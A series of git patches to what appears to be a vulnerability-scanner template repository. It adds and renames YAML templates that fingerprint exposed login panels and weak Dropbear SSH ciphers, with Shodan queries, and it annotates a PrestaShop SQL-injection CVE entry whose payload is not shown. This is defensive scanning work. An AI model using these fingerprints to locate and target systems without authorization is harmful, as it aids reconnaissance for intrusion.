a/network/detection/dropbear-cbc-ciphers.yaml +++ b/network/detection/dropbear-cbc-ciphers.yaml @@ -28,3 +28,4 @@ network: words: - "cbc" - "SSH-" + condition: and From ee4e6fe1e399aa410e69ed369844f7ef679287c1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Dec 2022 11:53:15 +0000 Subject: [PATCH 0875/1415] Auto Generated New Template Addition List [Fri Dec 2 11:53:15 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 07f1a88df3..0cd80c946a 100644 --- a/.new-additions +++ b/.new-additions @@ -45,6 +45,7 @@ misconfiguration/rabbitmq-exporter-metrics.yaml misconfiguration/s3-torrent.yaml misconfiguration/symfony-fosjrouting-bundle.yaml misconfiguration/unauth-etherpad.yaml +network/detection/dropbear-cbc-ciphers.yaml technologies/aerocms-detect.yaml technologies/oracle-httpserver12c.yaml technologies/payara-micro-server-detect.yaml From 7d256bb977414eceb77f2fa00f9f880e3dbee71f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 2 Dec 2022 17:28:09 +0530 Subject: [PATCH 0877/1415] Update dropbear-weakmac.yaml --- network/misconfig/dropbear-weakmac.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/network/misconfig/dropbear-weakmac.yaml b/network/misconfig/dropbear-weakmac.yaml index 143de50571..c88d78e901 100644 --- a/network/misconfig/dropbear-weakmac.yaml +++ b/network/misconfig/dropbear-weakmac.yaml @@ -23,9 +23,14 @@ network: - "{{Hostname}}" - "{{Host}}:22" + matchers-condition: and matchers: - type: word words: - "hmac-md5" - "hmac-sha1" condition: or + + - type: word + words: + - "SSH-" From 29a450cd35cd62b3d1a4adae9332c29a01e15f73 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Dec 2022 12:03:02 +0000 Subject: [PATCH 0878/1415] Auto Generated New Template Addition List [Fri Dec 2 12:03:02 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 0cd80c946a..6f94b8145d 100644 --- a/.new-additions +++ b/.new-additions @@ -46,6 +46,8 @@ misconfiguration/s3-torrent.yaml misconfiguration/symfony-fosjrouting-bundle.yaml misconfiguration/unauth-etherpad.yaml network/detection/dropbear-cbc-ciphers.yaml +network/misconfig/dropbear-weakalgo.yaml +network/misconfig/dropbear-weakmac.yaml technologies/aerocms-detect.yaml technologies/oracle-httpserver12c.yaml technologies/payara-micro-server-detect.yaml From 8eb2c41ad1c27badcdaf6a839295db6230f1ceb6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 2 Dec 2022 17:37:49 +0530 Subject: [PATCH 0880/1415] Update and rename exposed-panels/mikrotik-routeros-old.yaml to exposed-panels/mikrotik/mikrotik-routeros-old.yaml --- exposed-panels/{ => mikrotik}/mikrotik-routeros-old.yaml | 1 - 1 file changed, 1 deletion(-) rename exposed-panels/{ => mikrotik}/mikrotik-routeros-old.yaml (95%) diff --git a/exposed-panels/mikrotik-routeros-old.yaml b/exposed-panels/mikrotik/mikrotik-routeros-old.yaml similarity index 95% rename from exposed-panels/mikrotik-routeros-old.yaml rename to exposed-panels/mikrotik/mikrotik-routeros-old.yaml index d4881cd084..2915a28385 100644 --- a/exposed-panels/mikrotik-routeros-old.yaml +++ b/exposed-panels/mikrotik/mikrotik-routeros-old.yaml @@ -14,7 +14,6 @@ requests: path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word part: body From 670633d963abe165eb3bfe402029990480151570 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 2 Dec 2022 17:38:19 +0530 Subject: [PATCH 0881/1415] Rename exposed-panels/mikrotik-routeros.yaml to exposed-panels/mikrotik/mikrotik-routeros.yaml --- exposed-panels/{ => mikrotik}/mikrotik-routeros.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{ => mikrotik}/mikrotik-routeros.yaml (100%) diff --git a/exposed-panels/mikrotik-routeros.yaml b/exposed-panels/mikrotik/mikrotik-routeros.yaml similarity index 100% rename from exposed-panels/mikrotik-routeros.yaml rename to exposed-panels/mikrotik/mikrotik-routeros.yaml From 30694211f90b81d1a09f693420aa37b37ae4ed61 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 2 Dec 2022 17:38:54 +0530 Subject: [PATCH 0882/1415] Update mikrotik-routeros.yaml --- exposed-panels/mikrotik/mikrotik-routeros.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/mikrotik/mikrotik-routeros.yaml b/exposed-panels/mikrotik/mikrotik-routeros.yaml index 7766dea048..dfafbee913 100644 --- a/exposed-panels/mikrotik/mikrotik-routeros.yaml +++ b/exposed-panels/mikrotik/mikrotik-routeros.yaml @@ -1,7 +1,7 @@ id: mikrotik-routeros info: - name: MikroTik Router OS Login Panel - Detect + name: MikroTik Router OS - Login Panel Detect author: gy741 severity: info description: MikroTik Router OS login panel was detected. @@ -25,6 +25,7 @@ requests: - 'If this device is not in your possession, please contact your local network administrator' - '.mikrotik.com' condition: and + - type: status status: - 200 From bdc78ab2b0f943d3cf5e7804ee16f9efd5b4dd57 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Dec 2022 12:11:42 +0000 Subject: [PATCH 0883/1415] Auto Generated New Template Addition List [Fri Dec 2 12:11:42 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6f94b8145d..59238b2090 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml exposed-panels/locklizard-webviewer-panel.yaml exposed-panels/mach-proweb-login.yaml +exposed-panels/mikrotik/mikrotik-routeros-old.yaml exposed-panels/nuxeo-platform-panel.yaml exposed-panels/pega-web-panel.yaml exposed-panels/persis-panel.yaml From 5cd4fb06734719800f496ac86c4f8880a6e3b172 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Dec 2022 12:12:35 +0000 Subject: [PATCH 0884/1415] Auto Generated New Template Addition List [Fri Dec 2 12:12:35 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 59238b2090..e81ebc715c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ cves/2012/CVE-2012-0394.yaml +cves/2020/CVE-2020-26248.yaml cves/2021/CVE-2021-3110.yaml cves/2021/CVE-2021-43421.yaml cves/2022/CVE-2022-1883.yaml From 51e5d4ac35178bc24e64dae9d63de5e9d95a1723 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 2 Dec 2022 12:27:49 +0000 Subject: [PATCH 0885/1415] Auto Generated CVE annotations [Fri Dec 2 12:27:49 UTC 2022] :robot: --- cves/2020/CVE-2020-26248.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/cves/2020/CVE-2020-26248.yaml b/cves/2020/CVE-2020-26248.yaml index 9c5433731d..978899a21a 100644 --- a/cves/2020/CVE-2020-26248.yaml +++ b/cves/2020/CVE-2020-26248.yaml @@ -3,17 +3,22 @@ id: CVE-2020-26248 info: name: PrestaShop ProductComments < 4.2.0 - SQL Injection author: edoardottt - severity: critical + severity: high description: | In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module. reference: - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2020-26248 + - https://packagist.org/packages/prestashop/productcomments + - https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H + cvss-score: 8.2 cve-id: CVE-2020-26248 + cwe-id: CWE-89 metadata: - verified: true - tags: cve,cve2020,sqli,prestshop + verified: "true" + tags: cve,cve2020,sqli,prestshop,packetstorm requests: - raw: From f4f5a10692c7047988de7c4a76c5c5bd5fb6a1db Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 2 Dec 2022 18:13:13 +0530 Subject: [PATCH 0886/1415] Update opencart-login.yaml --- exposed-panels/opencart-login.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/exposed-panels/opencart-login.yaml b/exposed-panels/opencart-login.yaml index 89dbc2b03c..2d205ae196 100644 --- a/exposed-panels/opencart-login.yaml +++ b/exposed-panels/opencart-login.yaml @@ -1,7 +1,7 @@ -id: opencart-login +id: opencart-panel info: - name: OpenCart Login + name: OpenCart Login Panel author: ricardomaia severity: info description: | @@ -19,9 +19,8 @@ requests: - "{{BaseURL}}/admin" - "{{BaseURL}}/index.php?route=account/login" - redirects: true + host-redirects: true max-redirects: 2 - stop-at-first-match: true matchers: - type: regex From d77174368d6f71a9b27410fadce29f10da49a971 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Fri, 2 Dec 2022 14:27:58 +0000 Subject: [PATCH 0887/1415] Create dqs-superadmin.yaml --- exposed-panels/dqs-superadmin.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/dqs-superadmin.yaml diff --git a/exposed-panels/dqs-superadmin.yaml b/exposed-panels/dqs-superadmin.yaml new file mode 100644 index 0000000000..4c985d02b1 --- /dev/null +++ b/exposed-panels/dqs-superadmin.yaml @@ -0,0 +1,25 @@ +id: dqs-superadmin + +info: + name: DQS Superadmin + author: Hardik-Solanki + severity: info + metadata: + verified: true + shodan-query: title:"DQS Superadmin" + tags: panel,dqs,superadmin + +requests: + - method: GET + path: + - '{{BaseURL}}/#/login' + + matchers-condition: and + matchers: + - type: word + words: + - "DQS | Superadmin" + + - type: status + status: + - 200 From d5cb016cdea936b5faf39654100f1b63b5e14348 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Fri, 2 Dec 2022 14:52:21 +0000 Subject: [PATCH 0888/1415] Create flahscookie-superadmin.yaml --- flahscookie-superadmin.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 flahscookie-superadmin.yaml diff --git a/flahscookie-superadmin.yaml b/flahscookie-superadmin.yaml new file mode 100644 index 0000000000..45cbb90131 --- /dev/null +++ b/flahscookie-superadmin.yaml @@ -0,0 +1,25 @@ +id: flahscookie-superadmin + +info: + name: Flahscookie Superadmin + author: Hardik-Solanki + severity: info + metadata: + verified: true + shodan-query: title:"Flahscookie Superadmin" + tags: panel,flahscookie,superadmin + +requests: + - method: GET + path: + - '{{BaseURL}}/pages/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Flahscookie Superadmin" + + - type: status + status: + - 200 From 87e8640adf8cda2f0392d99a58c5b973defd0ae6 Mon Sep 17 00:00:00 2001 From: Hardik Solanki <49536512+HardikSolanki96@users.noreply.github.com> Date: Fri, 2 Dec 2022 15:11:53 +0000 Subject: [PATCH 0889/1415] Create superadmin-ui.yaml --- superadmin-ui.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 superadmin-ui.yaml diff --git a/superadmin-ui.yaml b/superadmin-ui.yaml new file mode 100644 index 0000000000..08ce4cb349 --- /dev/null +++ b/superadmin-ui.yaml @@ -0,0 +1,25 @@ +id: superadmin-ui + +info: + name: Superadmin UI + author: Hardik-Solanki + severity: info + metadata: + verified: true + shodan-query: title:"Superadmin UI - 4myhealth" + tags: panel,superadmin + +requests: + - method: GET + path: + - '{{BaseURL}}/#/login' + + matchers-condition: and + matchers: + - type: word + words: + - "Superadmin UI - 4myhealth" + + - type: status + status: + - 200 From 1d4f5ec08834ac4ba7fd5a25040880419558e74e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 21:46:42 +0530 Subject: [PATCH 0890/1415] Delete dqs-superadmin.yaml --- exposed-panels/dqs-superadmin.yaml | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 exposed-panels/dqs-superadmin.yaml diff --git a/exposed-panels/dqs-superadmin.yaml b/exposed-panels/dqs-superadmin.yaml deleted file mode 100644 index 4c985d02b1..0000000000 --- a/exposed-panels/dqs-superadmin.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: dqs-superadmin - -info: - name: DQS Superadmin - author: Hardik-Solanki - severity: info - metadata: - verified: true - shodan-query: title:"DQS Superadmin" - tags: panel,dqs,superadmin - -requests: - - method: GET - path: - - '{{BaseURL}}/#/login' - - matchers-condition: and - matchers: - - type: word - words: - - "DQS | Superadmin" - - - type: status - status: - - 200 From 710462c350cbfc3d3a0fd0027c0f05df6bd17e96 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 21:47:39 +0530 Subject: [PATCH 0891/1415] Update and rename dqs-superadmin.yaml to dqs-superadmin-panel.yaml --- .../{dqs-superadmin.yaml => dqs-superadmin-panel.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposed-panels/{dqs-superadmin.yaml => dqs-superadmin-panel.yaml} (86%) diff --git a/exposed-panels/dqs-superadmin.yaml b/exposed-panels/dqs-superadmin-panel.yaml similarity index 86% rename from exposed-panels/dqs-superadmin.yaml rename to exposed-panels/dqs-superadmin-panel.yaml index 4c985d02b1..5781c8c896 100644 --- a/exposed-panels/dqs-superadmin.yaml +++ b/exposed-panels/dqs-superadmin-panel.yaml @@ -1,7 +1,7 @@ -id: dqs-superadmin +id: dqs-superadmin-panel info: - name: DQS Superadmin + name: DQS Superadmin Login Panel author: Hardik-Solanki severity: info metadata: From 58840e7cb565dde0cc7057b007cd24eee326fdd8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 21:50:48 +0530 Subject: [PATCH 0892/1415] Update and rename flahscookie-superadmin.yaml to exposed-panels/flahscookie-superadmin-panel.yaml --- .../flahscookie-superadmin-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename flahscookie-superadmin.yaml => exposed-panels/flahscookie-superadmin-panel.yaml (85%) diff --git a/flahscookie-superadmin.yaml b/exposed-panels/flahscookie-superadmin-panel.yaml similarity index 85% rename from flahscookie-superadmin.yaml rename to exposed-panels/flahscookie-superadmin-panel.yaml index 45cbb90131..9c91045171 100644 --- a/flahscookie-superadmin.yaml +++ b/exposed-panels/flahscookie-superadmin-panel.yaml @@ -1,7 +1,7 @@ -id: flahscookie-superadmin +id: flahscookie-superadmin-panel info: - name: Flahscookie Superadmin + name: Flahscookie Superadmin Login author: Hardik-Solanki severity: info metadata: From c959619c2de9d7be6f34fc93af465fcac07e4b35 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 21:52:24 +0530 Subject: [PATCH 0893/1415] Delete dqs-superadmin.yaml --- exposed-panels/dqs-superadmin.yaml | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 exposed-panels/dqs-superadmin.yaml diff --git a/exposed-panels/dqs-superadmin.yaml b/exposed-panels/dqs-superadmin.yaml deleted file mode 100644 index 4c985d02b1..0000000000 --- a/exposed-panels/dqs-superadmin.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: dqs-superadmin - -info: - name: DQS Superadmin - author: Hardik-Solanki - severity: info - metadata: - verified: true - shodan-query: title:"DQS Superadmin" - tags: panel,dqs,superadmin - -requests: - - method: GET - path: - - '{{BaseURL}}/#/login' - - matchers-condition: and - matchers: - - type: word - words: - - "DQS | Superadmin" - - - type: status - status: - - 200 From 3e45d357d2e50d1764184b96fcd6160f0ec99238 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 21:52:40 +0530 Subject: [PATCH 0894/1415] Delete flahscookie-superadmin.yaml --- flahscookie-superadmin.yaml | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 flahscookie-superadmin.yaml diff --git a/flahscookie-superadmin.yaml b/flahscookie-superadmin.yaml deleted file mode 100644 index 45cbb90131..0000000000 --- a/flahscookie-superadmin.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: flahscookie-superadmin - -info: - name: Flahscookie Superadmin - author: Hardik-Solanki - severity: info - metadata: - verified: true - shodan-query: title:"Flahscookie Superadmin" - tags: panel,flahscookie,superadmin - -requests: - - method: GET - path: - - '{{BaseURL}}/pages/login' - - matchers-condition: and - matchers: - - type: word - words: - - "Flahscookie Superadmin" - - - type: status - status: - - 200 From 216b93e5a84b1bf46c81b6802df11368bcde80cb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 2 Dec 2022 21:53:30 +0530 Subject: [PATCH 0895/1415] Update and rename superadmin-ui.yaml to exposed-panels/superadmin-ui-panel.yaml --- superadmin-ui.yaml => exposed-panels/superadmin-ui-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename superadmin-ui.yaml => exposed-panels/superadmin-ui-panel.yaml (88%) diff --git a/superadmin-ui.yaml b/exposed-panels/superadmin-ui-panel.yaml similarity index 88% rename from superadmin-ui.yaml rename to exposed-panels/superadmin-ui-panel.yaml index 08ce4cb349..0c2218e562 100644 --- a/superadmin-ui.yaml +++ b/exposed-panels/superadmin-ui-panel.yaml @@ -1,7 +1,7 @@ -id: superadmin-ui +id: superadmin-ui-panel info: - name: Superadmin UI + name: Superadmin UI Login author: Hardik-Solanki severity: info metadata: From 990181a3122864a82288891cb63209988bbeb890 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Fri, 2 Dec 2022 16:24:17 -0500 Subject: [PATCH 0896/1415] Dashboard Content Enhancements (#6219) Dashboard Content Enhancements --- cves/2008/CVE-2008-6982.yaml | 1 + cves/2012/CVE-2012-0394.yaml | 2 + exposed-panels/exolis-engage-panel.yaml | 9 ++- .../locklizard-webviewer-panel.yaml | 9 ++- exposed-panels/mach-proweb-login.yaml | 10 +++- exposed-panels/minio-console.yaml | 11 +++- exposed-panels/mitel-panel-detect.yaml | 9 ++- exposed-panels/mobile-management-panel.yaml | 9 ++- exposed-panels/mobileiron-login.yaml | 9 ++- exposed-panels/mongodb-ops-manager.yaml | 9 ++- exposed-panels/monitorix-exposure.yaml | 10 +++- exposed-panels/movable-type-login.yaml | 9 ++- exposed-panels/ms-adcs-detect.yaml | 11 +++- exposed-panels/mspcontrol-login.yaml | 10 +++- exposed-panels/mybb-forum-detect.yaml | 9 ++- exposed-panels/mybb/mybb-forum-install.yaml | 9 ++- exposed-panels/nagios-panel.yaml | 9 ++- exposed-panels/nagios-xi-panel.yaml | 9 ++- exposed-panels/nagvis-panel.yaml | 9 ++- exposed-panels/nconf-panel.yaml | 9 ++- exposed-panels/neobox-panel.yaml | 9 ++- exposed-panels/neos-panel.yaml | 10 +++- exposed-panels/nessus-panel.yaml | 9 ++- .../netdata-dashboard-detected.yaml | 9 ++- exposed-panels/netdata-panel.yaml | 16 +++-- exposed-panels/netflix-conductor-ui.yaml | 11 +++- exposed-panels/netgear-version-detect.yaml | 9 ++- exposed-panels/netis-router.yaml | 9 ++- exposed-panels/netlify-cms.yaml | 9 ++- exposed-panels/netscaler-aaa-login.yaml | 9 ++- exposed-panels/netsus-server-login.yaml | 9 ++- exposed-panels/nginx-admin-panel.yaml | 9 ++- exposed-panels/nginx-proxy-manager.yaml | 9 ++- exposed-panels/nginx-ui-dashboard.yaml | 10 +++- exposed-panels/noescape-login.yaml | 9 ++- exposed-panels/nordex-wind-farm-portal.yaml | 10 +++- exposed-panels/novnc-login-panel.yaml | 9 ++- exposed-panels/nozomi-panel.yaml | 9 ++- exposed-panels/np-data-cache.yaml | 9 ++- exposed-panels/nport-web-console.yaml | 9 ++- exposed-panels/nutanix-web-console-login.yaml | 10 +++- exposed-panels/nuxeo-platform-panel.yaml | 60 ++++++++++--------- exposed-panels/nzbget-panel.yaml | 9 ++- exposed-panels/ocs-inventory-login.yaml | 9 ++- exposed-panels/octoprint-login.yaml | 11 +++- exposed-panels/officekeeper-admin-login.yaml | 9 ++- exposed-panels/oki-data.yaml | 9 ++- exposed-panels/okiko-sfiler-portal.yaml | 9 ++- exposed-panels/okta-panel.yaml | 9 ++- exposed-panels/olt-web-interface.yaml | 9 ++- exposed-panels/omniampx-panel.yaml | 9 ++- exposed-panels/open-game-panel.yaml | 9 ++- .../open-stack-dashboard-login.yaml | 9 ++- exposed-panels/openam-panel.yaml | 13 +++- exposed-panels/opencats-panel.yaml | 9 ++- exposed-panels/openemr-detect.yaml | 9 ++- exposed-panels/openerp-database.yaml | 11 +++- exposed-panels/openfire-admin-panel.yaml | 9 ++- exposed-panels/opennebula-panel.yaml | 10 +++- exposed-panels/opennms-web-console.yaml | 9 ++- exposed-panels/openshift-installer-panel.yaml | 9 ++- exposed-panels/opensis-panel.yaml | 9 ++- exposed-panels/openvpn-admin.yaml | 9 ++- exposed-panels/openvpn-connect.yaml | 9 ++- exposed-panels/openvpn-router-management.yaml | 9 ++- exposed-panels/openvz-web-login.yaml | 10 +++- exposed-panels/openx-panel.yaml | 9 ++- exposed-panels/oracle-business-control.yaml | 9 ++- .../oracle-business-intelligence.yaml | 9 ++- exposed-panels/oracle-containers-panel.yaml | 9 ++- .../oracle-enterprise-manager-login.yaml | 9 ++- exposed-panels/oracle-integrated-manager.yaml | 9 ++- exposed-panels/oracle-people-enterprise.yaml | 9 ++- 73 files changed, 606 insertions(+), 117 deletions(-) diff --git a/cves/2008/CVE-2008-6982.yaml b/cves/2008/CVE-2008-6982.yaml index 8bc95c03ff..1c42f706a1 100644 --- a/cves/2008/CVE-2008-6982.yaml +++ b/cves/2008/CVE-2008-6982.yaml @@ -14,6 +14,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 + cve-id: CVE-2008-6982 metadata: verified: "true" tags: cve,cve2008,devalcms,xss,cms,edb diff --git a/cves/2012/CVE-2012-0394.yaml b/cves/2012/CVE-2012-0394.yaml index fe942ac07a..2ab82b9d23 100644 --- a/cves/2012/CVE-2012-0394.yaml +++ b/cves/2012/CVE-2012-0394.yaml @@ -11,6 +11,8 @@ info: - https://www.exploit-db.com/exploits/31434 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394 - http://www.exploit-db.com/exploits/18329 + classification: + cve-id: CVE-2012-0394 metadata: shodan-query: html:"Struts Problem Report" verified: "true" diff --git a/exposed-panels/exolis-engage-panel.yaml b/exposed-panels/exolis-engage-panel.yaml index 1b151f0993..80d7398b65 100644 --- a/exposed-panels/exolis-engage-panel.yaml +++ b/exposed-panels/exolis-engage-panel.yaml @@ -1,11 +1,16 @@ id: exolis-engage-panel info: - name: Exolis Engage Panel + name: Exolis Engage Panel - Detect author: righettod + description: Exolis Engage panel was detected. severity: info reference: - https://www.exolis.fr/en/solution-2/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: html:"engage - Portail soignant" @@ -33,3 +38,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/locklizard-webviewer-panel.yaml b/exposed-panels/locklizard-webviewer-panel.yaml index 632c6dc457..80469f11cc 100644 --- a/exposed-panels/locklizard-webviewer-panel.yaml +++ b/exposed-panels/locklizard-webviewer-panel.yaml @@ -1,11 +1,16 @@ id: locklizard-webviewer-panel info: - name: Locklizard Web Viewer Panel + name: Locklizard Web Viewer Login Panel - Detect author: righettod severity: info + description: Locklizard Web Viewer login panel was detected. reference: - https://www.locklizard.com/pdf_security_webviewer/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: html:"Locklizard Web Viewer" @@ -31,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/mach-proweb-login.yaml b/exposed-panels/mach-proweb-login.yaml index 223347ff1f..f88ac8f3cd 100644 --- a/exposed-panels/mach-proweb-login.yaml +++ b/exposed-panels/mach-proweb-login.yaml @@ -1,13 +1,17 @@ id: mach-proweb-login info: - name: MACH-ProWeb Login Panel + name: MACH-ProWeb Login Panel - Detect author: Jaskaran severity: info description: | - MACH-ProWeb is building controller system used to access and control respective facilities easily + MACH-ProWeb login panel was detected. reference: - https://www.exploit-db.com/ghdb/8023 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true google-query: intitle:"Log on to MACH-ProWeb" @@ -28,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/minio-console.yaml b/exposed-panels/minio-console.yaml index b144543b9e..e9285ba2dc 100644 --- a/exposed-panels/minio-console.yaml +++ b/exposed-panels/minio-console.yaml @@ -1,9 +1,14 @@ id: minio-console info: - name: MinIO Console + name: MinIO Console Login Panel - Detect author: pussycat0x severity: info + description: MinIO Console login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,minio metadata: fofa-query: app="MinIO-Console" @@ -23,4 +28,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/mitel-panel-detect.yaml b/exposed-panels/mitel-panel-detect.yaml index 4aed7793bd..f7b1ce83d2 100644 --- a/exposed-panels/mitel-panel-detect.yaml +++ b/exposed-panels/mitel-panel-detect.yaml @@ -1,9 +1,14 @@ id: mitel-panel-detect info: - name: Mitel Panel Detect + name: Mitel Login Panel - Detect author: ritikchaddha severity: info + description: Mitel login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Mitel Networks" @@ -28,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/mobile-management-panel.yaml b/exposed-panels/mobile-management-panel.yaml index c9f8e66cd6..8e65ca20b8 100644 --- a/exposed-panels/mobile-management-panel.yaml +++ b/exposed-panels/mobile-management-panel.yaml @@ -1,9 +1,14 @@ id: mobile-management-panel info: - name: Mobile Management Platform Panel Detect + name: Mobile Management Platform Panel - Detect author: ritikchaddha severity: info + description: Mobile Management Platform panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true fofa-query: title="移动管理平台-企业管理" @@ -33,3 +38,5 @@ requests: group: 1 regex: - 'version = "(.*)"' + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/mobileiron-login.yaml b/exposed-panels/mobileiron-login.yaml index f8134ee8b9..8f5c7a77be 100644 --- a/exposed-panels/mobileiron-login.yaml +++ b/exposed-panels/mobileiron-login.yaml @@ -1,9 +1,14 @@ id: mobileiron-login info: - name: MobileIron Login + name: MobileIron Login Panel - Detect author: dhiyaneshDK,dwisiswant0 severity: info + description: MobileIron login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,mobileiron requests: @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/mongodb-ops-manager.yaml b/exposed-panels/mongodb-ops-manager.yaml index 6842c0e9a4..ae3badf788 100644 --- a/exposed-panels/mongodb-ops-manager.yaml +++ b/exposed-panels/mongodb-ops-manager.yaml @@ -1,9 +1,14 @@ id: mongodb-ops-manager info: - name: MongoDB Ops Manager + name: MongoDB Ops Manager Login Panel - Detect author: dhiyaneshDK severity: info + description: MongoDB Ops Manager login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"MongoDB Ops Manager" tags: panel,mongodb @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git a/exposed-panels/monitorix-exposure.yaml b/exposed-panels/monitorix-exposure.yaml index 141ed37c97..3c9726e5a8 100644 --- a/exposed-panels/monitorix-exposure.yaml +++ b/exposed-panels/monitorix-exposure.yaml @@ -1,12 +1,16 @@ id: monitorix-exposure info: - name: Monitorix + name: Monitorix Panel - Detect author: geeknik severity: low - description: Monitorix is a free, open source, lightweight system monitoring tool designed to monitor as many services and system resources as possible. + description: Monitorix panel was detected. reference: - https://www.monitorix.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: monitorix,exposure,logs,panel requests: @@ -28,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/29 diff --git 